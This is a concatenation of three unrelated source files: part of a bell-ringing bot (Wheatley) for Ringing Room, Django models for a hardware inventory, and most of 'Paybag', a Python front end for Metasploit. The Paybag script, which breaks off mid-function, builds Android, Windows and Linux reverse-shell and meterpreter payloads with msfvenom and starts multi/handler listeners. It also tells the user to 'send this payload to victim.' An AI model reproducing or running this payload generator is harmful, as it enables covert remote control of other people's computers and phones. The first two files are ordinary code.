self._tower.invoke_on_call[calls.LOOK_TO].append(self._on_look_to)
self._tower.invoke_on_call[calls.GO].append(self._on_go)
self._tower.invoke_on_call[calls.BOB].append(self._on_bob)
self._tower.invoke_on_call[calls.SINGLE].append(self._on_single)
self._tower.invoke_on_call[calls.THATS_ALL].append(self._on_thats_all)
self._tower.invoke_on_call[calls.ROUNDS].append(self._on_rounds)
self._tower.invoke_on_call[calls.STAND].append(self._on_stand_next)
self._tower.invoke_on_bell_rung.append(self._on_bell_ring)
self._tower.invoke_on_reset.append(self._on_size_change)
if self._server_mode:
self._tower.invoke_on_setting_change.append(self._on_setting_change)
self._tower.invoke_on_row_gen_change.append(self._on_row_gen_change)
self._tower.invoke_on_stop_touch.append(self._on_stop_touch)
self._is_ringing = False
self._is_ringing_rounds = False
self._is_ringing_opening_row = True
# This is used as a counter - once `Go` or `Look To` is received, the number of rounds left
# is calculated and then decremented at the start of every subsequent row until it reaches
# 0, at which point the method starts. We keep a counter rather than a simple flag so that
# calls can be called **before** going into changes when Wheatley is calling (useful for
# calling the first method name in spliced and early calls in Original, Erin, etc.). The
# value `None` is used to represent the case where we don't know when we will be starting
# the method (and therefore there it makes no sense to decrement this counter).
self._rounds_left_before_method: Optional[int] = None
self._rows_left_before_rounds: Optional[int] = None
self._should_stand = False
self._row_number = 0
self._place = 0
self._opening_row: Row = row_generator.start_row
self._rounds: Row = rounds(self.number_of_bells)
self._row: Row = self._rounds
# This is used because the row's calls are generated at the **end** of each row (or on
# `Look To`), but need to be called at the **start** of the next row.
self._calls: List[str] = []
self.logger = logging.getLogger(self.logger_name)
# Log what we're going to ring, and how to stop Wheatley
self.logger.info(f"Wheatley will ring {self.row_generator.summary_string()}")
self.logger.info("Press `Control-C` to stop Wheatley ringing, e.g. to change method.")
# Convenient properties that are frequently used
@property
def stroke(self) -> Stroke:
"""Returns true if the current row (determined by self._row_number) represents a handstroke."""
return Stroke.from_index(self._row_number)
@property
def number_of_bells(self) -> int:
"""Convenient property to find the number of bells in the current tower."""
return self._tower.number_of_bells
@property
def _server_mode(self) -> bool:
return self._server_instance_id is not None
# Callbacks
def _on_setting_change(self, key: str, value: Any) -> None:
def log_invalid_key(message: str) -> None:
self.logger.warning(f"Invalid value for {key}: {message}")
if key == "use_up_down_in":
try:
self._do_up_down_in = to_bool(value)
self.logger.info(f"Setting 'use_up_down_in' to {self._do_up_down_in}")
except ValueError:
log_invalid_key(f"{value} cannot be converted into a bool")
elif key == "stop_at_rounds":
try:
self._stop_at_rounds = to_bool(value)
self.logger.info(f"Setting 'stop_at_rounds' to {value}")
except ValueError:
log_invalid_key(f"{value} cannot be converted into a bool")
else:
self._rhythm.change_setting(key, value, time.time())
def _on_row_gen_change(self, row_gen_json: JSON) -> None:
try:
# We need a mutex lock on `self.next_row_generator` to prevent a possible race
# conditions when reducing the tower size (see the definition of
# `self.next_row_generator` in `__init__` for more details)
with self.next_row_generator_lock:
self.next_row_generator = json_to_row_generator(row_gen_json, self.logger)
self.logger.info(f"Next touch, Wheatley will ring {self.next_row_generator.summary_string()}")
except RowGenParseError as e:
self.logger.warning(e)
def _on_size_change(self) -> None:
self._check_number_of_bells()
self._opening_row = generate_starting_row(self.number_of_bells, self.row_generator.custom_start_row)
self._rounds = rounds(self.number_of_bells)
self._check_starting_row() # Check that the current row gen is OK (otherwise warn the user)
# Check that `self.next_row_generator` has the right stage
with self.next_row_generator_lock:
if self.next_row_generator is not None and not self._check_number_of_bells(
self.next_row_generator, silent=True
):
self.logger.warning("Next row gen needed too many bells, so is being removed.")
# If the `next_row_generator` can't be rung on the new stage, then remove it.
self.next_row_generator = None
def _check_starting_row(self) -> bool:
if (
self.row_generator.custom_start_row is not None
and len(self.row_generator.custom_start_row) < self.number_of_bells
):
self.logger.info(
f"The starting row '{self.row_generator.custom_start_row}' "
+ f"contains fewer bells than the tower ({self.number_of_bells}). "
+ "Wheatley will add the extra bells to the end of the change."
)
if len(self._opening_row) != self.number_of_bells:
self.logger.warning(
f"The current tower has fewer bells ({self.number_of_bells}) "
+ f"than the starting row {self._opening_row}. Wheatley will not ring!"
)
return False
return True
def _check_number_of_bells(self, row_gen: Optional[RowGenerator] = None, silent: bool = False) -> bool:
"""Returns whether Wheatley can ring with the current number of bells with reasons why not"""
# If the user doesn't pass the `row_gen` argument, then default to `self.row_generator`
row_gen = row_gen or self.row_generator
if row_gen.stage == 0:
self.logger.debug("Place holder row generator. Wheatley will not ring!")
return False
if self._tower.number_of_bells < row_gen.stage:
if not silent: # only log if `silent` isn't set
self.logger.warning(
f"Row generation requires at least {row_gen.stage} bells, "
+ f"but the current tower has {self.number_of_bells}. "
+ "Wheatley will not ring!"
)
return False
if self._tower.number_of_bells > row_gen.stage + 1 and row_gen.custom_start_row is None:
if row_gen.stage % 2:
expected = row_gen.stage + 1
else:
expected = row_gen.stage
if not silent: # only log if `silent` isn't set
self.logger.info(
f"Current tower has more bells ({self.number_of_bells}) than expected "
+ f"({expected}). Wheatley will add extra cover bells."
)
return True
def _on_look_to(self) -> None:
if self._check_starting_row() and self._check_number_of_bells():
self.look_to_has_been_called(time.time())
# This is public because it's used by `wheatley.main.server_main`. `server_main` calls it
# because, when running Wheatley on the RR servers, it is entirely possible that a new Wheatley
# process is invoked a few seconds **after** 'Look To' has been called. This does not
# necessarily make Wheatley start late (because Bryn takes ~3 seconds to say 'Look To'), but the
# new Wheatley instance needs to know _when_ 'Look To' was called (otherwise the new instance
# doesn't know when to start ringing). To achieve this, the RR server remembers the timestamp
# of `Look To` and passes it to the new instance through the `--look-to-time` argument (defined
# in `server_main`). The main function then creates the `Bot` singleton and immediately calls
# `look_to_has_been_called`, forwarding the `--look-to-time` as the argument.
#
# **side note**: system clocks on different computers are really rarely in sync, so it's
# generally a very bad idea to pass timestamps between two processes, in case they end up
# running on different machines. However, in our case, the only time `--look-to-time` is used
# is when Wheatley is running on the same machine as the RR server itself. So (in this case) we
# are fine.
def look_to_has_been_called(self, call_time: float) -> None:
"""Callback called when a user calls 'Look To'."""
self._rhythm.return_to_mainloop()
treble = self._rounds[0]
# Count number of user controlled bells
number_of_user_controlled_bells = sum(1 for bell in self._rounds if self._user_assigned_bell(bell))
self._rhythm.initialise_line(
self.number_of_bells,
self._user_assigned_bell(treble),
call_time + LOOK_TO_DURATION,
number_of_user_controlled_bells,
)
# Move to the next row generator if it's defined
self.row_generator = self.next_row_generator or self.row_generator
self.next_row_generator = None
# Clear all the flags and counters
self._should_stand = False
self._rows_left_before_rounds = None
# Set _rounds_left_before_method if we are ringing up-down-in (3 rounds for backstroke
# start; 2 for handstroke)
if not self._do_up_down_in:
self._rounds_left_before_method = None
elif self.row_generator.start_stroke().is_hand():
self._rounds_left_before_method = 2
else:
self._rounds_left_before_method = 3
# Reset the state, so that Wheatley starts by ringing rounds
self._is_ringing = True
self._is_ringing_rounds = True
self._is_ringing_opening_row = True
# Start at the first place of the first row
self.start_next_row(is_first_row=True)
def _on_go(self) -> None:
"""Callback called when a user calls 'Go'."""
if self._is_ringing_rounds or self._is_ringing_opening_row:
# Calculate how many more rows of rounds we should ring before going into changes (1 if
# the person called 'Go' on the same stroke as the RowGenerator starts, otherwise 0).
# These values are one less than expected because we are setting
# _rounds_left_before_method **after** the row has started.
self._rounds_left_before_method = 1 if self.stroke == self.row_generator.start_stroke() else 0
# Make sure to call all of the calls that we have missed in the right order (in case the
# person calling `Go` called it stupidly late)
early_calls = [
(ind, calls)
for (ind, calls) in self.row_generator.early_calls().items()
if ind > self._rounds_left_before_method
]
# Sort early calls by the number of rows **before** the method start. Note that we are
# sorting by a quantity that counts **down** with time, hence the reversed sort.
early_calls.sort(key=lambda x: x[0], reverse=True)
# In this case, we don't want to wait until the next row before making these calls
# because the rows on which these calls should have been called have already passed.
# Therefore, we simply get them out as quickly as possible so they have the best chance
# of being heard.
for (_, c) in early_calls:
self._make_calls(c)
def _on_bob(self) -> None:
"""Callback called when a user calls 'Bob'."""
self.row_generator.set_bob()
def _on_single(self) -> None:
"""Callback called when a user calls 'Single'."""
self.row_generator.set_single()
def _on_thats_all(self) -> None:
"""Callback called when a user calls 'That`s All'."""
# We set this to one, because we expect one clear row between the call and rounds
self._rows_left_before_rounds = 1
def _on_rounds(self) -> None:
"""Callback called when a user calls 'Rounds'."""
# We set this to one, because we expect one clear row between the call and rounds
self._is_ringing_opening_row = True
def _on_stand_next(self) -> None:
"""Callback called when a user calls 'Stand Next'."""
self._should_stand = True
def _on_bell_ring(self, bell: Bell, stroke: Stroke) -> None:
"""Callback called when the Tower receives a signal that a bell has been rung."""
if self._user_assigned_bell(bell):
# This will give us the stroke _after_ the bell rings, we have to invert it, because
# otherwise this will always expect the bells on the wrong stroke and no ringing will
# ever happen
self._rhythm.on_bell_ring(bell, stroke.opposite(), time.time())
def _on_stop_touch(self) -> None:
self.logger.info("Got to callback for stop touch")
self._tower.set_is_ringing(False)
self._is_ringing = False
self._rhythm.return_to_mainloop()
# Mainloop and helper methods
def expect_bell(self, index: int, bell: Bell) -> None:
"""Called to let the rhythm expect a user-controlled bell at a certain time and stroke."""
if self._user_assigned_bell(bell):
self._rhythm.expect_bell(bell, self._row_number, index, self.stroke)
def generate_next_row(self) -> None:
"""Creates a new row from the row generator and tells the rhythm to expect the new bells."""
if self._is_ringing_opening_row:
self._row = self._opening_row
elif self._is_ringing_rounds:
self._row = self._rounds
else:
self._row, self._calls = self.row_generator.next_row_and_calls(self.stroke)
# Add cover bells if needed
if len(self._row) < len(self._opening_row):
self._row = Row(self._row + self._opening_row[len(self._row) :])
bells = " ".join([str(bell) for bell in self._row])
self.logger.info(f"ROW: {bells}")
def start_next_row(self, is_first_row: bool) -> None:
"""Updates state of bot ready to ring the next row / stop ringing"""
# Generate the next row and update row indices
self._place = 0
if is_first_row:
self._row_number = 0
else:
self._row_number += 1
# Useful local variables
has_just_rung_rounds = self._row == self._rounds
next_stroke = Stroke.from_index(self._row_number)
# Implement handbell-style stopping at rounds
if self._stop_at_rounds and has_just_rung_rounds and not self._is_ringing_opening_row:
self._should_stand = True
# Set any early calls specified by the row generator to be called at the start of the next
# row
if self._rounds_left_before_method is not None:
self._calls = self.row_generator.early_calls().get(self._rounds_left_before_method) or []
# Start the method if necessary
if self._rounds_left_before_method == 0:
# Sanity check that we are in fact starting on the correct stroke (which is no longer
# trivially guaranteed since we use a counter rather than a flag to determine when to
# start the method)
assert next_stroke == self.row_generator.start_stroke()
self._rounds_left_before_method = None
self._is_ringing_rounds = False
self._is_ringing_opening_row = False
# If the tower size somehow changed, then call 'Stand' but keep ringing rounds (Wheatley
# calling 'Stand' will still generate a callback to `self._on_stand_next`, so we don't
# need to handle that here)
if not self._check_number_of_bells():
self._make_call("Stand")
self._is_ringing_rounds = True
self.row_generator.reset()
if self._rounds_left_before_method is not None:
self._rounds_left_before_method -= 1
# If we're starting a handstroke ...
if next_stroke.is_hand():
# ... and 'Stand' has been called, then stand
if self._should_stand:
self._should_stand = False
self._is_ringing = False
# There are two cases for coming round:
# 1. Someone calls 'That's All' and rounds appears
# (or)
# 2. Someone calls 'That's All', one clear row has elapsed
if self._rows_left_before_rounds == 0 or (
has_just_rung_rounds and self._rows_left_before_rounds is not None
):
self._rows_left_before_rounds = None
self._is_ringing_rounds = True
if self._rows_left_before_rounds is not None:
self._rows_left_before_rounds -= 1
# If we've set `_is_ringing` to False, then no more rounds can happen so early return to
# avoid erroneous calls
if not self._is_ringing:
return
# Generate the next row, and tell the rhythm detection where the next row's bells are
# expected to ring
self.generate_next_row()
for (index, bell) in enumerate(self._row):
self.expect_bell(index, bell)
def tick(self) -> None:
"""
Move the ringing on by one place. This 'tick' function is called once every time a bell is
rung.
"""
bell = self._row[self._place]
user_controlled = self._user_assigned_bell(bell)
self._rhythm.wait_for_bell_time(
time.time(), bell, self._row_number, self._place, user_controlled, self.stroke
)
if not user_controlled:
self._tower.ring_bell(bell, self.stroke)
# If we are ringing the first bell in the row, then also make any calls that are needed.
if self._place == 0:
self._make_calls(self._calls)
# Move one place through the ringing
self._place += 1
# Start a new row if we get to a place that's bigger than the number of bells
if self._place >= self.number_of_bells:
self.start_next_row(is_first_row=False)
def main_loop(self) -> None:
"""
Wheatley's main loop. The main thread will get stuck forever in this function whilst
Wheatley rings. The outer main-loop contains two sub-loops: the first one for Wheatley
waiting to ring (triggered by `Look To`), where the second one makes Wheatley ring
by repeatedly calling `self.tick()`.
"""
while True:
# Log a message to say that Wheatley is waiting for 'Look To!'
self.logger.info("Waiting for 'Look To'...")
# Waiting to ring: Sit in an infinite loop whilst we're not ringing, and exit Wheatley
# if the tower is inactive for long enough.
self._last_activity_time = time.time()
while not self._is_ringing:
time.sleep(0.01)
if self._server_mode and time.time() > self._last_activity_time + INACTIVITY_EXIT_TIME:
self.logger.info(f"Timed out - no activity for {INACTIVITY_EXIT_TIME}s. Exiting.")
return
# Start ringing: note that this code runs **IMMEDIATELY** after `Look To` is called, but
# `self._rhythm` is told to wait until after Bryn has finished saying `Look To`.
if self._do_up_down_in:
self.logger.info(f"Starting to ring {self.row_generator.summary_string()}")
else:
self.logger.info(f"Waiting for 'Go' to ring {self.row_generator.summary_string()}...")
if self._server_mode:
self._tower.set_is_ringing(True) # Set text in Wheatley box to 'Wheatley is ringing...'
# All Wheatley instances should return a 'Roll Call' message after `Look To`, but
# **only** if they are actually able to start ringing. This prevents a problem
# where Wheatleys could get stuck in a state where they respond to the roll-call but
# are unable to ring. The RR server gets a roll-call reply, assumes everything is
# fine, and ends up creating a 'zombie' Wheatley instance. To the user, this just
# looks like Wheatley has gone off in a huff
assert self._server_instance_id is not None
self._tower.emit_roll_call(self._server_instance_id)
# Repeatedly ring until the ringing stops
while self._is_ringing:
self.tick()
# Add a tiny bit of extra delay between each stroke so that Wheatley doesn't DDoS
# Ringing Room if `self._rhythm.wait_for_bell_time()` returns immediately
time.sleep(0.01)
# Finish ringing
self.logger.info("Stopping ringing!")
if self._server_mode:
self._tower.set_is_ringing(False) # Set text in Wheatley box to 'Wheatley will ring...'
def _user_assigned_bell(self, bell: Bell) -> bool:
"""Returns `True` if this bell is not assigned to Wheatley."""
return not self._bot_assigned_bell(bell)
def _bot_assigned_bell(self, bell: Bell) -> bool:
"""Returns `True` if this bell **is** assigned to Wheatley."""
return self._tower.is_bell_assigned_to(bell, self._user_name)
def _make_calls(self, call_list: List[str]) -> None:
"""Broadcast a sequence of calls"""
for c in call_list:
self._make_call(c)
def _make_call(self, call: str) -> None:
"""Broadcast a call, unless we've been told not to call anything."""
if self._call_comps:
self._tower.make_call(call)
|
#HARDWARE_AQUISITION = BudgetLine.objects.get(id=3)
from django.contrib.auth.models import User
from django.db import models
from django.forms import fields
from django.utils.translation import ugettext_lazy as _
from what_apps.commerce.models import RealThing
from what_apps.products.models import Product, ProductBrand
import re
MAC_RE = r'^([0-9a-fA-F]{2}([:-]?|$)){6}$'
mac_re = re.compile(MAC_RE)
class DisplayType(models.Model):
name=models.CharField(max_length=20)
class DeviceInterface(models.Model):
name=models.CharField(max_length=20)
class Purpose(models.Model):
name=models.CharField(max_length=80)
description=models.TextField()
class PrinterType(models.Model):
name=models.CharField(max_length=20)
class PurposeRationale(models.Model):
'''This model asks:
Why is a device assigned to its current purpose(s)?
'''
name=models.CharField(max_length=80)
#heres the additional description.
description=models.TextField()
device=models.ForeignKey('Device')
purpose=models.ForeignKey('Purpose')
class DeviceModel(Product): #Ethereal
'''
The make and model of a device.
IE, "Asus GTX9000" or whatever.
This will be the "GTX9000" part.
'''
designation = models.CharField(max_length=80)
brand=models.ForeignKey(ProductBrand)
def __unicode__(self):
return self.brand.name + " " + self.name
class QuickId(models.Model):
'''
Nothing but an int field. Maybe some methods someday?
'''
id = models.CharField(max_length=10, primary_key=True)
thing = models.OneToOneField('commerce.RealThing', related_name="quick")
class Device(RealThing):
model = models.ForeignKey(DeviceModel)
purpose=models.ManyToManyField(Purpose, through='PurposeRationale', blank=True, null=True)
location=models.ForeignKey('presence.Location', blank=True, null=True)
def __unicode__(self):
return self.model.name
class NetworkDevice(Device):
ip_address=models.IPAddressField()
mac_address=models.CharField(max_length=17, blank=True, null=True)
lan_speed=models.IntegerField()
hostname=models.CharField(max_length=60)
inward_neighbour = models.ForeignKey('self', related_name="outward_neighbour", null=True, blank=True)
connected=models.BooleanField()
def list_outward_neighbors(self):
return self.outward_neighbours.all()
def incoming_budget_line(self):
if not self.model.incoming_budget_line:
self.model.incoming_budget_line = HARDWARE_AQUISITION
return self.model.incoming_budget_line
class ComputerFormFactor(models.Model):
name=models.CharField(max_length=30)
class Computer(NetworkDevice):
form_factor=models.ForeignKey(ComputerFormFactor)
public_use=models.BooleanField()
#we need to associate computers with components contained and peripherals attached
class WAP(NetworkDevice):
SSID=models.CharField(max_length=100)
#a,b,g, or n
broadcast=models.CharField(max_length=10)
class Peripheral(Device):
connectivity=models.ForeignKey(DeviceInterface)
class Printer(Peripheral):
type=models.ForeignKey(PrinterType)
multifunction=models.BooleanField()
class Display(Device):
type=models.ForeignKey(DisplayType)
class Component(Device):
connectivity=models.ManyToManyField(DeviceInterface)
class RAM(Component):
#DDR, SDRAM, DRAM Etc.
type=models.CharField(max_length=200)
size=models.IntegerField() #should be followed with a unit of measurement
class HDD(Component):
capacity=models.IntegerField() #should be followed with a unit of measurement
class PowerSupply(Component):
max_output=models.IntegerField()
power_connectivity=models.ForeignKey(DeviceInterface)
class PowerAdapter(Device):
voltage=models.FloatField()
amperage=models.FloatField()
class CPU(Component):
FQ=models.IntegerField()#Should be followed by GHZ or MHZ
class Cable(Device):
connectivity=models.ManyToManyField(DeviceInterface)
class PowerStrip(Device):
port_value=models.IntegerField()
plug_form_factor=models.CharField(max_length=40)
|
# Paybag
# Author - D3adpool2K
# github - https://github.com/Deadpool2000
import os
import random
import sys
from prettytable import PrettyTable
import distro
try:
os.system('clear')
R='\033[91m'
Y='\033[93m'
G='\033[92m'
CY='\033[96m'
W='\033[97m'
B='\033[95m'
global osname
def start():
print(CY+"""
____ __
/ __ \____ ___ __/ /_ ____ _____ _
/ /_/ / __ `/ / / / __ \/ __ `/ __ `/
/ ____/ /_/ / /_/ / /_/ / /_/ / /_/ /
/_/ \__,_/\__, /_.___/\__,_/\__, /
/____/ /____/
"""+Y+"""
[--"""+R+""">"""+Y+""" v1.2 """+R+"""<"""+Y+"""--]"""+G+"""
>> Payload generator for Metasploit <<"""+CY+"""
---------------------------"""+B+"""
Code By -> Deadpool2000""")
def main():
print(R+"""\n************************************************"""+CY+"""\n
>>> Main menu"""+Y+"""
1) Create a payload
2) Start listner
3) Launch Metasploit
4) Exit\n""")
def osi():
print(R+"""\n
************************************************"""+Y+"""
>>> Select operating system to create payload\n"""+CY+"""
1) Android
2) Windows
3) Linux
99) Back to main menu\n""")
def lst():
print(R+"""\n
************************************************"""+Y+"""
>>> Select operating system to create listner\n"""+CY+"""
1) Android
2) Windows
3) Linux
99) Back to main menu\n""")
def payld():
print(R+"""
************************************************"""+Y+"""
>>> Select payload\n"""+CY+"""
1) windows/meterpreter/reverse_tcp
2) windows/x64/meterpreter/reverse_tcp (For 64-bit)
3) windows/vncinject/reverse_tcp
4) windows/x64/vncinject/reverse_tcp (For 64-bit)
5) windows/shell/reverse_tcp
6) windows/x64/shell/reverse_tcp (For 64-bit)
7) windows/powershell_reverse_tcp
8) windows/x64/powershell_reverse_tcp (For 64-bit)
99) Back to main menu\n""")
def linux_payload():
print(R+"""
************************************************"""+Y+"""
>>> Select payload\n"""+CY+"""
1) linux/x86/meterpreter/reverse_tcp
2) linux/x64/meterpreter/reverse_tcp (For 64-bit)
3) linux/x86/shell/reverse_tcp
4) linux/x64/shell/reverse_tcp (For 64-bit)
99) Back to main menu\n""")
def arch1():
print(CY+"""Select Architecture -"""+R+"""1)"""+Y+""" x86"""+R+""" 2)"""+Y+""" x64""")
def checkver():
if sys.version_info[0] < 3:
print(Y+"Use Python 3 to run this script"+R+"!"+W)
exit(0)
def install():
print(Y+"\nInstalling Metasploit-framework...\n"+W)
premsf=['kali','parrot']
deb=['ubuntu','debian']
did=distro.like()
did2=distro.id()
print(did)
if did in deb:
if did in premsf:
os.system("sudo apt-get upodate && sudo apt-get install metasploit-framework")
else:
os.system("sudo apt-get install -y build-essential zlib1g zlib1g-dev libpq-dev libpcap-dev libsqlite3-dev ruby ruby-dev")
os.system("cd $HOME && git clone https://github.com/rapid7/metasploit-framework.git")
os.system("cd $HOME/metasploit-framework && sudo gem install bundler && bundle install")
os.system("sudo cp assets/msfconsole /usr/bin/ && sudo cp assets/msfvenom /usr/bin/ && sudo cp assets/msfupdate /usr/bin/")
os.system("clear")
elif(did==""):
print(Y+"\nOther distro detected ! Please install metasploit manually.\n"+W)
exit(0)
else:
print(R+"\nSomething went wrong!\n"+W)
def mk():
if os.path.exists("payload")==False:
os.system("mkdir payload")
def check():
try:
os.remove('msh.rc')
except FileNotFoundError:
print()
pth="/data/data/com.termux/files/usr/bin/bash"
def check2():
if os.path.isfile(pth)==False:
if os.path.isfile('/usr/bin/msfconsole')==False:
print(R+"""
************************************************\n************************************************\n"""
+Y+"\nmsfconsole not found ! Please install Meatsploit-Framework properly and try again :( \n"+W)
p=input(CY+"Install Metasploit?"+G+" (y|n)"+R+" >>> "+W)
if p=="y":
install()
start()
mk()
check()
check2()
ch3()
main()
sel()
elif p=="n":
print(Y+"\nExit.........! Have a nice day :) ")
print(R+"\n------------"+CY+" Code by >>"+G+" Deadpool2000"+R+" ----------------------"+W)
exit(0)
else:
print(R+"\nInvalid choice ! Leaving.......\n"+W)
exit(0)
exit(0)
def cfile(lh,lp,ply):
f=open("msh.rc","w+")
l1="use exploit/multi/handler"
l2="set PAYLOAD "+str(ply)
l3="set LHOST "+str(lh)
l4="set LPORT "+str(lp)
l5="set ExitOnSession false"
l6="exploit -j -z"
f.write("%s\n%s\n%s\n%s\n%s\n%s\n" %(l1,l2,l3,l4,l5,l6))
f.close()
return
def crplyd(lh,lp,ply,osname,ext):
print(B+"\nGenerating payload..........\n")
a=random.randint(1,99)
st1=str(osname)+str(a)+str(ext)
st="msfvenom -p "+str(ply)+" lhost="+str(lh)+" lport="+str(lp)+" R > payload/"+str(st1)
os.system(st)
print(R+"\n>>>"+G+" Payload saved as ("+Y+st1+G+") in 'payload' folder"+R+" <<<\n")
print(CY+"Now send this payload to victim. Then start 'handler' from main menu\n")
return
def table():
global ipd
global adr
tb=PrettyTable()
tb.field_names=["No.","Interface","Address"]
inte=os.listdir('/sys/class/net/')
i=j=k=0
adr=[]
for i in range(len(inte)):
cout=inte[i]
st="ifconfig "+str(cout)+" | grep 'inet ' | cut -c 13-26"
opt=os.popen(st)
ipd=opt.read()
cr=['n','e','t','m','a','s','k']
for l in cr:
ipd=ipd.replace(l,'')
ipd=ipd.strip()
adr.append(ipd)
tb.add_row([k,inte[i],adr[j]])
i+=1
j+=1
k+=1
print(Y+"\n>>> Select LHOST from list\n"+W)
print(tb)
try:
sc=int(input(G+"\nSelect your choice >>"+W+" "))
try:
ipd=adr[sc]
if ipd=="":
print(R+"\nNull address found!Select another address!")
table()
else:
print(CY+"\nSelected LHOST:"+W,ipd)
except IndexError:
print(R+"\nInvalid Choice! Please try again!")
table()
except ValueError:
print(R+"\nInvalid Choice! Please try again!")
table()
def sel():
try:
c=int(input(G+"Select your choice >>"+W+" "))
if c==1:
def sel1():
try:
ch=int(input(G+"Select your choice >>"+W+" "))
# Android
if ch==1:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="android/meterpreter/reverse_tcp"
osname="android_"
ext=".apk"
crplyd(lh,lp,ply,osname,ext)
osi()
sel1()
# Windows
elif ch==2:
try:
payld()
cc=int(input(G+"Select your choice >>"+W+" "))
if cc==1:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/meterpreter/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==2:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/meterpreter/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==3:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/vncinject/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==4:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/vncinject/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==5:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/shell/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==6:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/shell/reverse_tcp"
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==7:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/powershell_reverse_tcp "
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
elif cc==8:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/powershell_reverse_tcp "
osname="win_"
ext=".exe"
crplyd(lh,lp,ply,osname,ext)
else:
print(R+"\nInvalid Choice! Please try again!")
osi()
sel1()
except ValueError:
print(R+"\nInvalid Choice! Please try again!")
osi()
sel1()
osi()
sel1()
# Linux
elif ch==3:
try:
linux_payload()
cc=int(input(G+"Select your choice >>"+W+" "))
if cc==1:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x86/meterpreter/reverse_tcp"
osname="linux_"
ext=".elf"
crplyd(lh,lp,ply,osname,ext)
elif cc==2:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x64/meterpreter/reverse_tcp"
osname="linux_"
ext=".elf"
crplyd(lh,lp,ply,osname,ext)
elif cc==3:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x86/shell/reverse_tcp"
osname="linux_"
ext=".elf"
crplyd(lh,lp,ply,osname,ext)
elif cc==4:
lh=input(CY+"\nEnter LHOST:"+W+" ")
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x64/shell/reverse_tcp"
osname="linux_"
ext=".elf"
crplyd(lh,lp,ply,osname,ext)
else:
print(R+"\nInvalid Choice! Please try again!")
osi()
sel1()
except ValueError:
print(R+"\nInvalid Choice! Please try again!")
osi()
sel1()
osi()
sel1()
elif ch==99:
os.system('clear')
start()
main()
sel()
else:
print(R+"\nInvalid Choice! Please try again\n")
osi()
sel1()
except ValueError:
print(R+"\nInvalid input ! Please try again !\n")
sel1()
osi()
sel1()
elif c==2:
def sel2():
try:
ch=int(input(G+"Select your choice >>"+W+" "))
if ch==1:
pr=os.path.isfile("msh.rc")
if pr:
check()
else:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="android/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
os.system('clear')
print(Y+"\nStarting handler...............\n"+W)
os.system("msfconsole -r msh.rc")
os.remove('msh.rc')
os.system("clear")
lst()
sel2()
elif ch==2:
try:
pr=os.path.isfile('msh.rc')
if pr:
check()
else:
payld()
ch=int(input(G+"Select your choice >>"+W+" "))
if ch==1:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
elif ch==2:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
elif ch==3:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/vncinject/reverse_tcp"
cfile(lh,lp,ply)
elif ch==4:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/vncinject/reverse_tcp"
cfile(lh,lp,ply)
elif ch==5:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/shell/reverse_tcp"
cfile(lh,lp,ply)
elif ch==6:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/shell/reverse_tcp"
cfile(lh,lp,ply)
elif ch==7:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/powershell_reverse_tcp"
cfile(lh,lp,ply)
elif ch==8:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="windows/x64/powershell_reverse_tcp"
cfile(lh,lp,ply)
else:
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
os.system('clear')
print(Y+"\nStarting handler...............\n"+W)
os.system("msfconsole -r msh.rc")
os.remove('msh.rc')
os.system('clear')
lst()
sel2()
except ValueError:
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
elif ch==3:
try:
pr=os.path.isfile('msh.rc')
if pr:
check()
else:
linux_payload()
ch=int(input(G+"Select your choice >>"+W+" "))
if ch==1:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x86/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
elif ch==2:
table()
lh=ipd
